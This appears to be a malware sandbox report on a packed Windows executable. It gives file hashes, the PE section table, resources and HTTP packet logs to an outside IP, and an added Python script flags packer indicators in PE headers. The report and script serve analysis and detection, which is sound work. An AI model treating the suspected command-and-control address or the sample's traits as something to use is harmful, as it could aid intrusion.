                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.2.8.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4680
                                  Entropy (8bit):4.439858664342186
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zs2rJg77aI92hWpW8VYgYm8M4JQBF9C+q8vlu501zysd:uIjfWI7kw7VUJ4CKq01zysd
                                  MD5:F47ACFE7314D0A95585FCB03C18E7132
                                  SHA1:B0E1DC8A726B0974A22628C7512F9059799B852E
                                  SHA-256:4E904906C967EF448EA99E6B6EABD43B5785005B637DD8D1BE1F3CE4CC5D85DB
                                  SHA-512:6A1D7D7372901754375946FC7DD7F50556211995AB20694AB38D75E2312A135DB1A67EFDC1216DE53717EC316B059CB7F9B8F5E7D5B539F124B114593058E2D9
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639761" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):97296
                                  Entropy (8bit):7.9982317718947025
                                  Encrypted:true
                                  SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                  MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                  SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                  SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                  SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):21
                                  Entropy (8bit):3.880179922675737
                                  Encrypted:false
                                  SSDEEP:3:gFsR0GOWW:gyRhI
                                  MD5:408E94319D97609B8E768415873D5A14
                                  SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                  SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                  SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:9tKiK3bsYm4fMuK47Pk3s
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:V:V
                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                  Malicious:false
                                  Preview:0
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:V:V
                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                  Malicious:false
                                  Preview:0
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:V:V
                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                  Malicious:false
                                  Preview:0
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.421544473090592
                                  Encrypted:false
                                  SSDEEP:6144:USvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNF0uhiTw:fvloTMW+EZMM6DFyL03w
                                  MD5:6A46D8B1A39569CCBFC04195B7D08801
                                  SHA1:B95975F0BB95BC3D66BB88D840EF0FB700588FAD
                                  SHA-256:D1AB3D691D5742561BD9A9C47168D34195F131DC4ED6F6F4038F7EAD6C2C146F
                                  SHA-512:12E7922003F1465C3D80D4D253BD7BD45B4F29D4AFDF8AC1D0FBF520C5F0C4ED325B16DD569889E8CE1BB9D073CF039841F37B2078BEF5494610078568AE49CC
                                  Malicious:false
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.9415752137965
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:4kahanaK78.exe
                                  File size:1'933'312 bytes
                                  MD5:3c2e26d10fa55af2e913120df3b7eddb
                                  SHA1:a6ba8c6378d44616d7196331c6ea54e286136ce6
                                  SHA256:4463effeb9799edfe6c07776f1e044718792fabb6ea103b9ee016e5efd21a985
                                  SHA512:be0d54efddd550dd9acc996df86ff2dc86a8fb50aa84e7d018736d16e06a97c746c2a3b92f70b56773fa791fe3b6ba365d676ed7683cd8f82738b2743d2a82c6
                                  SSDEEP:49152:kA8icQ8TAFCy7gjmjVD6Gd1R6ESxZ9MswgY+YP7Mnr:YNFyM4VmIDS39MrGk7M
                                  TLSH:F495336F6ED11688CDA302368CFEC02003ADB27FD426EFA76855861ADEF843767D5121
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...
                                  Icon Hash:e7a99a8a8651790c
                                  Entrypoint:0xc58000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                  Time Stamp:0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:0
                                  File Version Major:5
                                  File Version Minor:0
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point, 0xc58000 in .taggant)
jmp 00007F0E0506114Ah
divps xmm3, dqword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al (repeated 93 times: the rest of the listed bytes are 00 00 padding)
                                  Programming Language:
                                  • [C++] VS2008 build 21022
                                  • [ASM] VS2008 build 21022
                                  • [ C ] VS2008 build 21022
                                  • [IMP] VS2005 build 50727
                                  • [RES] VS2008 build 21022
                                  • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x41805b | 0x6f | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40d000 | 0xaea0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x84f894 | 0x18 | bqzwvadu
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x40c000 | 0x24e00 | 946c5dd01022c1c2772e91561195811b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x40d000 | 0xaea0 | 0x7000 | a9c31158c7d64ad7bcf22ff2db82fd1a | False | 0.9677036830357143 | data | 7.892251172950252 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x418000 | 0x1000 | 0x200 | b8539b83d0b3f253ed2a56b71af0554b | False | 0.154296875 | data | 1.085758102617974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x419000 | 0x295000 | 0x200 | ac7cd5ba6236978d99eefdd0da13dd7c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bqzwvadu | 0x6ae000 | 0x1a9000 | 0x1a8600 | 1491ba212e8b8de30169cac4faae0ead | False | 0.9901198913843888 | data | 7.948647238498833 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gbufcztg | 0x857000 | 0x1000 | 0x600 | e9b3a93672082bc0915a0a37e864e70a | False | 0.5631510416666666 | data | 5.018851124211002 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x858000 | 0x3000 | 0x2200 | f817d0c44529368b6e411a8447409ea2 | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
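The section table above is the kind of header a static triage script should flag before anything is executed: the entry point sits in .taggant rather than a code section, five sections are both writable and executable, two sections have no name, bqzwvadu and .rsrc have entropy close to 8.0, and the TLS directory points into bqzwvadu instead of .rdata or .data. The following is an added example, not Joe Sandbox code: a standard-library Python parser for the PE32 headers with those checks on top. build_sample_pe() constructs a synthetic image in memory that copies this table's section names, virtual addresses, virtual sizes and characteristics together with the report's entry point, TLS directory and TimeDateStamp; its raw bytes are synthetic filler, not the sample's contents. STANDARD_CODE_SECTIONS and the 7.0 entropy cut-off are this script's own assumptions.

```python
"""Static PE32 triage: entry-point section, RWX sections, per-section entropy,
TLS directory location and build timestamp. Added example, not Joe Sandbox code;
build_sample_pe() constructs a synthetic image with the report's section layout."""
import math
import random
import struct
from collections import Counter
from datetime import datetime, timezone

SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}   # assumption: what counts as standard
DIR_TLS = 9                                          # data-directory index of the TLS entry


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 is random/encrypted, ~0 is padding."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe32(blob: bytes) -> dict:
    """Read the header fields the triage needs (stdlib only, no pefile)."""
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    fh = e_lfanew + 4                                  # IMAGE_FILE_HEADER
    _, nsect, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, fh)
    opt = fh + 20                                      # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", blob, opt + 16)[0]
    ndirs = struct.unpack_from("<I", blob, opt + 92)[0]
    dirs = [struct.unpack_from("<II", blob, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):                             # 40-byte IMAGE_SECTION_HEADERs
        name, vsize, va, rawsz, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "chars": chars, "entropy": shannon_entropy(blob[rawptr:rawptr + rawsz])})
    return {"timestamp": timestamp, "entry_rva": entry_rva, "dirs": dirs, "sections": sections}


def section_for_rva(sections, rva):
    """Section whose virtual range contains rva, or None."""
    return next((s for s in sections if s["va"] <= rva < s["va"] + s["vsize"]), None)


def triage(pe: dict) -> list:
    """Indicator strings in a stable order; the last one is the decoded timestamp."""
    hits, secs, rwx = [], pe["sections"], SCN_EXECUTE | SCN_WRITE
    ep = section_for_rva(secs, pe["entry_rva"])
    ep_name = ep["name"] if ep else "<none>"
    if ep_name not in STANDARD_CODE_SECTIONS:
        hits.append(f"entry point 0x{pe['entry_rva']:x} lies in section {ep_name!r}")
    for s in secs:
        if s["chars"] & rwx == rwx:
            hits.append(f"section {s['name']!r} is writable and executable")
        if s["entropy"] > 7.0:
            hits.append(f"section {s['name']!r} entropy {s['entropy']:.2f} (packed/encrypted)")
        if not s["name"]:
            hits.append(f"unnamed section at rva 0x{s['va']:x}")
    tls_rva, tls_size = pe["dirs"][DIR_TLS]
    if tls_size:
        tls_sec = section_for_rva(secs, tls_rva)
        tls_name = tls_sec["name"] if tls_sec else "<none>"
        hits.append(f"TLS directory in section {tls_name!r}")
    compiled = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
    hits.append("compiled " + compiled.strftime("%Y-%m-%d %H:%M:%S UTC"))
    return hits


def build_sample_pe() -> bytes:
    """Synthetic PE32 with the report's section names, RVAs and rights; contents are filler."""
    rng = random.Random(1)
    rnd = lambda n: bytes(rng.getrandbits(8) for _ in range(n))   # high-entropy filler
    rwx, rw = SCN_READ | SCN_WRITE | SCN_EXECUTE, SCN_READ | SCN_WRITE
    layout = [  # name, VirtualAddress, VirtualSize, Characteristics, raw bytes
        ("", 0x1000, 0x40C000, rwx, b"\x90" * 0x200),
        (".rsrc", 0x40D000, 0xAEA0, rw, rnd(0x1000)),
        (".idata", 0x418000, 0x1000, rw, b"\0" * 0x200),
        ("", 0x419000, 0x295000, rwx, b"\0" * 0x200),
        ("bqzwvadu", 0x6AE000, 0x1A9000, rwx, rnd(0x1000)),
        ("gbufcztg", 0x857000, 0x1000, rwx, b"\0" * 0x200),
        (".taggant", 0x858000, 0x3000, rwx, b"\0" * 0x200),
    ]
    opt = bytearray(224)                                 # IMAGE_OPTIONAL_HEADER32
    struct.pack_into("<H", opt, 0, 0x10B)                # Magic
    struct.pack_into("<I", opt, 16, 0x858000)            # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)            # ImageBase
    struct.pack_into("<I", opt, 92, 16)                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * DIR_TLS, 0x84F894, 0x18)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(layout), 0x65B12CA8, 0, 0, len(opt), 0x0103)
    headers_size, sect_tbl, body = 0x400, b"", b""
    for name, va, vsize, chars, data in layout:
        sect_tbl += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, va,
                                len(data), headers_size + len(body), 0, 0, 0, 0, chars)
        body += data
    dos = bytearray(0x40)
    dos[:2], dos[0x3C:0x40] = b"MZ", struct.pack("<I", 0x40)   # e_lfanew -> PE header
    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + sect_tbl
    return headers.ljust(headers_size, b"\0") + body


if __name__ == "__main__":
    for line in triage(parse_pe32(build_sample_pe())):
        print(line)
```

Run against a real file with `triage(parse_pe32(open(path, "rb").read()))`. The entropy figures on the synthetic image are only meaningful for the two sections filled with random bytes; on the real sample they would reproduce the table's 7.89 and 7.95. The script deliberately does not walk the import table; the report's single kernel32.dll!lstrcpy import is a separate packer indicator that needs RVA-to-file-offset mapping this example leaves out.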
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x84f8f4 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.7971748400852878
RT_ICON | 0x85079c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.7838447653429603
RT_ICON | 0x851044 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.7200460829493087
RT_ICON | 0x85170c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.740606936416185
RT_ICON | 0x851c74 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkmen | Turkmenistan | 0.6840248962655602
RT_ICON | 0x85421c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkmen | Turkmenistan | 0.7345215759849906
RT_ICON | 0x8552c4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkmen | Turkmenistan | 0.7622950819672131
RT_ICON | 0x855c4c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkmen | Turkmenistan | 0.8111702127659575
RT_STRING | 0x413c80 | 0x330 | data | | | 0.8370098039215687
RT_STRING | 0x413fb0 | 0x170 | data | | | 0.15
RT_STRING | 0x414120 | 0x620 | empty | | | 0
RT_STRING | 0x414740 | 0x762 | empty | | | 0
RT_STRING | 0x414ea4 | 0x852 | empty | | | 0
RT_STRING | 0x4156f8 | 0x726 | empty | | | 0
RT_STRING | 0x415e20 | 0x658 | empty | | | 0
RT_STRING | 0x416478 | 0x6c0 | empty | | | 0
RT_STRING | 0x416b38 | 0x638 | empty | | | 0
RT_STRING | 0x417170 | 0x88a | empty | | | 0
RT_ACCELERATOR | 0x4179fc | 0x20 | empty | | | 0
RT_GROUP_ICON | 0x8560b4 | 0x76 | data | Turkmen | Turkmenistan | 0.6610169491525424
RT_VERSION | 0x85612a | 0x1b4 | data | | | 0.5711009174311926
RT_MANIFEST | 0x8562de | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Language of compilation system | Country where language is spoken | Map
Turkmen | Turkmenistan |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:37:49.985579014 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:50.105441093 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:50.105684042 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:50.105938911 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:50.226643085 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:51.585705996 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:51.585849047 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:51.595069885 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:51.714787960 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.120620012 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.120786905 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.126172066 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.245748043 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.747107029 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.747183084 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.747215986 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.747234106 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.747256994 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.747272015 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.747422934 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.747440100 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.747458935 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.747464895 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.747478008 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.747481108 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.747499943 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.747515917 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.748111010 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.748156071 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.755369902 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.755434036 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.755616903 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.755676031 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.763876915 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.763942957 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.763942003 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.763991117 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.944946051 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.944993019 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.945079088 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.945115089 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.947216988 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.947283983 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.947376013 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.947539091 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.955174923 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.955296040 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.955388069 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.955447912 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.963172913 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.963263988 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.963310003 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.963395119 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.971180916 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.971447945 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.971628904 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.971704960 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.979140043 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.979226112 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.979270935 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.979321957 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.987063885 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.987140894 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.987221956 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.987271070 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.995100975 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.995194912 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:52.995620012 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:52.995690107 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
